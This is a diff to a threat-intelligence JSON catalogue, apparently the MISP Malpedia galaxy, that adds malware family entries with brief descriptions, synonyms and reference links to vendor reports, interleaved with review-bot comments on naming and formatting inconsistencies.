 "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/",
 "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet",
 "http://securitykitten.github.io/an-evening-with-n3utrino/",
@@ -10795,8 +12464,9 @@
 "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf",
 "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/",
+ "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services",
 "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services"
+ "http://blogs.360.cn/post/analysis-of-apt-c-37.html"
 ],
 "synonyms": [
 "Bladabindi"
@@ -10865,10 +12535,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim",
+ "https://www.cert.pl/en/news/single/nymaim-revisited/",
+ "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded",
+ "https://bitbucket.org/daniel_plohmann/idapatchwork",
 "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/",
 "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf",
- "https://www.cert.pl/en/news/single/nymaim-revisited/",
- "https://bitbucket.org/daniel_plohmann/idapatchwork"
+ "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim"
 ],
 "synonyms": [
 "nymain"
@@ -11091,6 +12763,19 @@ "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", "value": "OpBlockBuster" }, + { + "description": "FireEye details ORANGEADE as a dropper for the CREAMSICLE malware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "092262b0-c631-400d-9f38-017cd59a14fd", + "value": "ORANGEADE" + }, { "description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.", "meta": { @@ -11109,10 +12794,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", + "https://orcustechnologies.com/", "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors", + "https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html", "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", - "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", - "https://orcustechnologies.com/" + "https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/", + "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/" ], "synonyms": [], "type": [] 
@@ -11134,6 +12821,19 @@ "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", "value": "Ordinypt" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor", + "https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "10a521e4-b3b9-4feb-afce-081531063e7b", + "value": "Outlook Backdoor" + }, { "description": "", "meta": { @@ -11246,6 +12946,19 @@ "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", "value": "parasite_http" }, + { + "description": "Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.peepy_rat", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "49321579-9dfe-45c6-80df-79467e4af65d", + "value": "Peepy RAT" + }, { "description": "", "meta": { 
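Review bot: The new entry at the end of this line is internally inconsistent: its description names the family "Peppy" (the name used by the Proofpoint Transparent Tribe report it cites) while `value` is `"Peepy RAT"` and the Malpedia ref points at `win.peepy_rat`. Since `value` is the string MISP tags carry, the spelling should be confirmed against the Malpedia page before this identifier is published; if Malpedia really uses `peepy_rat` the description should say so, otherwise both the value and the ref look like a typo of "Peppy".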
@@ -11334,6 +13047,21 @@ "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", "value": "Philadephia Ransom" }, + { + "description": " Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal", + "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf" + ], + "synonyms": [ + "Rizzo" + ], + "type": [] + }, + "uuid": "3aa6fd62-9b91-4136-af0e-08af7962ba4b", + "value": "PHOREAL" + }, { "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.", "meta": { @@ -11341,8 +13069,9 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", "https://www.johannesbader.ch/2016/02/phorpiex/", "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", - "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/", - "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows" + "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", + "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", + "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" ], "synonyms": [ "Trik" 
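Review bot: The PHOREAL description begins with a stray leading space (`" Phoreal is a very simple backdoor ..."`) that no other description in the file has, and the prose spells the name `Phoreal` while `value` is `"PHOREAL"`; trimming the space and aligning the casing with the cited Cylance report keeps the record consistent. The phrase `via ICMP on port 53` is also self-contradictory because ICMP has no port field, so if it is a verbatim quote from the Cylance whitepaper it should be marked as such, and otherwise restated as whatever the source actually describes.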
@@ -11519,20 +13248,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", + "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", + "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", "https://community.rsa.com/thread/185439", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", - "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", - "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", + "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", "https://securelist.com/time-of-death-connected-medicine/84315/", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", + "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf" ], 
@@ -11566,6 +13296,7 @@ "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", "http://blogs.360.cn/post/APT_C_01_en.html", @@ -11665,6 +13396,19 @@ "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", "value": "poscardstealer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0215eae2-0ab7-4567-8ac6-1be36a7893a6", + "value": "PoshC2" + }, { "description": "", "meta": { @@ -11691,6 +13435,19 @@ "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", "value": "PowerDuke" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerkatz", + "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9e3aaf82-268b-47d1-b953-3799c5e1f475", + "value": "powerkatz" + }, { "description": "", "meta": { 
@@ -11705,11 +13462,13 @@ "value": "PowerPool" }, { - "description": "", + "description": "A malware of the gozi group, developed on the base of isfb. It uses Office Macros and PowerShell in documents distributed in e-mail messages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", - "https://lokalhost.pl/gozi_tree.txt" + "https://lokalhost.pl/gozi_tree.txt", + "https://www.thesecuritybuddy.com/malware-prevention/what-is-powersniff-malware/", + "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/" ], "synonyms": [], "type": [] @@ -11724,6 +13483,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", + "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], "synonyms": [], @@ -11750,6 +13510,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator", + "https://securelist.com/a-predatory-tale/89779", "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/" ], "synonyms": [], @@ -11805,6 +13566,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", + "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/", "https://twitter.com/mesa_matt/status/1035211747957923840" ], "synonyms": [], 
@@ -11833,7 +13595,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon",
- "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
+ "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html",
+ "https://cert.gov.ua/news/42",
+ "https://blog.threatstop.com/russian-apt-gamaredon-group",
+ "https://cert.gov.ua/news/46"
 ],
 "synonyms": [],
 "type": []
@@ -11870,20 +13636,22 @@ "value": "Punkey POS" }, { - "description": "", + "description": "Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", - "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", - "https://github.com/n1nj4sec/pupy" + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://github.com/n1nj4sec/pupy", + "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" ], "synonyms": [], "type": [] }, "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", - "value": "pupy" + "value": "pupy (Windows)" }, { "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. 
There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.", @@ -11961,8 +13729,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", - "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", + "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", + "https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" ], "synonyms": [ @@ -12009,9 +13778,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", - "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", + "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", "http://contagiodump.blogspot.com/2010/11/template.html", + "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/", "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", 
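Review bot: The pupy hunk renames an existing cluster value from `"pupy"` to `"pupy (Windows)"` while keeping the uuid `8a789016-5f8d-4cd9-ba96-ba253db42fd8`; in a MISP galaxy the value is the string that tags carry (`misp-galaxy:malpedia="pupy"`), so existing tags and value-based references stop matching even though the uuid is stable. If the rename is meant to disambiguate from a non-Windows pupy entry added elsewhere in this commit, consider adding `"pupy"` to `synonyms` so the old name still resolves. The hunk's final context line (the Pushdo description) is broken across two lines here, which looks like a rendering artifact rather than part of the change.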
@@ -12078,15 +13848,17 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", + "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://github.com/quasar/QuasarRAT/tree/master/Client", "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://twitter.com/malwrhunterteam/status/789153556255342596", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments" + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" ], "synonyms": [], "type": [] @@ -12094,6 +13866,19 @@ "uuid": "05252643-093b-4070-b62f-d5836683a9fa", "value": "Quasar RAT" }, + { + "description": "Qulab is an AutoIT Malware focusing on stealing & clipping content from victim's machines.\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qulab", + "https://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "728ce877-6f1d-4719-81df-387a8e395695", + "value": "Qulab" + }, { "description": "", "meta": { 
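Review bot: The new Qulab description ends with a literal `\r\n`, which renders as a trailing blank line wherever the description is displayed and is most likely pasted from the Malpedia page rather than intended; the same carriage-return noise appears in the ServHelper (L126), SHIPSHAPE (L127, ending in `\r\n\r\n`) and SPACESHIP (L128, where `\r\n` breaks mid-sentence) descriptions. Strip the trailing whitespace and join the hard-wrapped SPACESHIP sentences into one paragraph, e.g. `"description": "Qulab is an AutoIT Malware focusing on stealing & clipping content from victim's machines."`.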
@@ -12151,7 +13936,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo",
- "https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor"
+ "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html"
 ],
 "synonyms": [
 "brebsd"
@@ -12279,6 +14064,20 @@
 "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431",
 "value": "RapidStealer"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog",
+ "https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/",
+ "https://tracker.fumik0.com/malware/Rarog"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "184e5134-473c-4a01-9a8b-f4776f178fc9",
+ "value": "Rarog"
+ },
 {
 "description": "",
 "meta": {
@@ -12325,6 +14124,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs",
+ "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/",
 "https://www.f-secure.com/documents/996508/1030745/callisto-group",
 "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/"
 ],
@@ -12392,15 +14192,29 @@ "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", "value": "RedAlpha" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redaman", + "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "97dab1f9-724a-4560-9c70-90c0d1d7fa4b", + "value": "Redaman" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", - "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "http://blog.macnica.net/blog/2017/12/post-8c22.html", + "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" ], @@ -12484,6 +14298,7 @@ "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "http://malware-traffic-analysis.net/2017/12/22/index.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", 
@@ -12502,7 +14317,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi",
 "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf"
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf",
+ "https://securelist.com/chafer-used-remexi-malware/89538/"
 ],
 "synonyms": [],
 "type": []
@@ -12527,7 +14343,8 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy",
+ "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html"
 ],
 "synonyms": [],
 "type": []
@@ -12566,11 +14383,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe",
+ "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/",
 "https://github.com/cocaman/retefe",
- "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
 "https://www.govcert.admin.ch/blog/33/the-retefe-saga",
 "https://www.govcert.admin.ch/blog/35/reversing-retefe",
- "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/"
+ "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
+ "https://github.com/Tomasuh/retefe-unpacker"
 ],
 "synonyms": [
 "Tsukuba",
@@ -12612,6 +14430,19 @@
 "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1",
 "value": "RGDoor"
 },
+ {
+ "description": "Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rietspoof",
+ "https://blog.avast.com/rietspoof-malware-increases-activity"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ec67123a-c3bc-4f46-b9f3-569c19e224ca",
+ "value": "Rietspoof"
+ },
 {
 "description": "",
 "meta": {
@@ -12664,6 +14495,35 @@ "uuid": "a85b0619-ed8e-4324-8603-af211d682dac", "value": "Ripper ATM" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "148a7078-3a38-4974-8990-9d5881f8267b", + "value": "Rising Sun" + }, + { + "description": "CyberInt states that Remote Manipulator System (RMS) is a legitimate tool developed by Russian organization TektonIT and has been observed in campaigns conducted by TA505 as well as numerous smaller campaigns likely attributable to other, disparate, threat actors. In addition to the availability of commercial licenses, the tool is free for non-commercial use and supports the remote administration of both Microsoft Windows and Android devices.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rms", + "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf" + ], + "synonyms": [ + "Remote Manipulator System" + ], + "type": [] + }, + "uuid": "94339b04-9332-4691-b820-5021368f1d3a", + "value": "RMS" + }, { "description": "", "meta": { 
@@ -12704,6 +14564,20 @@
 "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf",
 "value": "Rofin"
 },
+ {
+ "description": "A .NET variant of ps1.roguerobin",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roguerobin",
+ "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/",
+ "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "25b08d2e-f803-4520-9518-4d95ce9f6ed4",
+ "value": "RogueRobinNET"
+ },
 {
 "description": "",
 "meta": {
@@ -12789,6 +14663,23 @@
 "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b",
 "value": "Roseam"
 },
+ {
+ "description": "Ransomware that was discovered over the last months of 2016 and likely based on Gomasom, another ransomware family.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rotorcrypt",
+ "https://id-ransomware.blogspot.com/2016/10/rotorcrypt-ransomware.html",
+ "https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/"
+ ],
+ "synonyms": [
+ "RotoCrypt",
+ "Rotor"
+ ],
+ "type": []
+ },
+ "uuid": "f20ef9a8-6ffc-4ef2-98ba-44f6b2eab966",
+ "value": "RotorCrypt"
+ },
 {
 "description": "",
 "meta": {
@@ -12972,7 +14863,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk", - "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/" + "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", + "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", + "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html", + "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/" ], "synonyms": [], "type": [] @@ -13035,7 +14932,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf" + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf", + "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf" ], "synonyms": [], "type": [] @@ -13076,6 +14974,19 @@ "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", "value": "Sanny" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache", + "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "056eca1f-4195-48c3-81d8-ed554dd1de20", + "value": "SappyCache" + }, { "description": "", "meta": { 
